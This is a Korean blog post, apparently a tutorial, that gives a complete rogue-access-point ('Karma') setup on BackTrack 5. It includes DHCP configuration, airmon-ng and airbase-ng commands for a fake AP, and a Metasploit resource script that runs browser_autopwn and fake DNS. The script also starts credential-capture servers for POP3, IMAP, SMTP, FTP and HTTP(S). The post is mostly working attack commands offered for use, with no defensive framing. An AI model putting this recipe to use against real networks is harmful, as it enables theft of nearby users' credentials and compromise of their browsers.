티스토리 뷰
0x00. 환경구성
OS : BackTrack 5 R3 (32-bit)
Kernel : Linux bt 3.2.6
# netstat -nltp
0x01. dhcp3-server install
# vi /etc/apt/sources.list
deb http://all.repository.backtrack-linux.org revolution main microverse non-free testing
deb http://64.repository.backtrack-linux.org revolution main microverse non-free testing
deb http://source.repository.backtrack-linux.org revolution main microverse non-free testing
deb http://updates.repository.backtrack-linux.org revolution main microverse non-free testing
# apt-get install dhcp3-server
0x02. dhcpd.conf
# vi /etc/dhcp3/dhcpd.conf
option domain-name-servers 10.0.0.1;
#default-lease-time 600;
max-lease-time 720;
ddns-update-style none;
authoritative;
log-facility local7;
subnet 10.0.0.0 netmask 255.255.255.0 {
range 10.0.0.100 10.0.0.254;
option routers 10.0.0.1;
option domain-name-servers 10.0.0.1;
}
0x03. karma.rc
# vi /root/karma.rc
load db_sqlite3
db_create /root/karma.db
use auxiliary/server/browser_autopwn
setg AUTOPWN_HOST 10.0.0.1
setg AUTOPWN_PORT 55550
setg AUTOPWN_URI /ads
set LHOST 10.0.0.1
set LPORT 45000
set SRVPORT 55550
set URIPATH /ads
run
use auxiliary/server/capture/pop3
set SRVPORT 110
set SSL false
run
use auxiliary/server/capture/pop3
set SRVPORT 995
set SSL true
run
use auxiliary/server/capture/ftp
run
use auxiliary/server/capture/imap
set SSL false
set SRVPORT 143
run
use auxiliary/server/capture/imap
set SSL true
set SRVPORT 993
run
use auxiliary/server/capture/smtp
set SSL false
set SRVPORT 25
run
use auxiliary/server/capture/smtp
set SSL true
set SRVPORT 465
run
use auxiliary/server/fakedns
unset TARGETHOST
set SRVPORT 5353
run
use auxiliary/server/fakedns
unset TARGETHOST
set SRVPORT 53
run
use auxiliary/server/capture/http
set SRVPORT 80
set SSL false
run
use auxiliary/server/capture/http
set SRVPORT 8080
set SSL false
run
use auxiliary/server/capture/http
set SRVPORT 443
set SSL true
run
use auxiliary/server/capture/http
set SRVPORT 8443
set SSL true
run
0x04. iwconfig
Configure a wireless network interface.
iwconfig is similar to ifconfig, but is dedicated to the wireless interfaces.
# iwconfig
0x05. airmon-ng
airmon-ng is script can be used to enable monitor mode on wireless interfaces.
airmon-ng <start|stop> <interface>
# airmon-ng start wlan0
0x06. airbase-ng
Multi-purpose tool aimed at attacking clients as opposed to the Access Point (AP) itself.
airbase-ng [options] <interface>
[Options]
-y
: When using this options, the fake AP will not respond to broad-cast probes.
-c <channel>
: This is used to specify the channel on which to run the Access Point.
[Filter options]
-e <ESSID>
--essid <ESSID>
: Specify a single ESSID.
# airbase-ng -y -c 9 -e "Fake-AP" mon0
0x07. Virtual NIC at0 config
# ifconfig at0 up 10.0.0.1 netmask 255.255.255.0
# route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
# ifconfig at0
0x08. DHCP Server Activation
# mkdir -p /var/run/dhcpd && chown dhcpd:dhcpd /var/run/dhcpd
# dhcpd3 -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcpd/dhcpd.pid at0
# cat /var/lib/dhcp3/dhcpd.leases
DHCP 서버가 클라이언트 호스트에게 할당한 IP 주소에 대한 할당 정보를 기록
0x09. Metasploit
# msfconsole -r karma.rc
'Tip' 카테고리의 다른 글
| 달력 표시하기 (0) | 2017.03.14 |
|---|---|
| Stop using SHA-1 (0) | 2017.02.27 |
| Kali 기본적인 설정 (패키지 관리, 한글 입력) (0) | 2016.11.04 |
| Wireless Hacking - WPA Key Crack (0) | 2016.09.04 |
| Wireless Hacking - WEP Key Crack (0) | 2016.09.03 |
| df / du 용량 확인 (0) | 2016.06.27 |
| Bash Shell History 흔적 제거 (0) | 2016.06.20 |
| [Emacs] 시작, 이동 그리고 종료 (0) | 2016.02.19 |
| BurpSuite 특정 대상만 보기 (0) | 2016.02.08 |
| MySQL 특정 버전 설치하기 (0) | 2016.01.20 |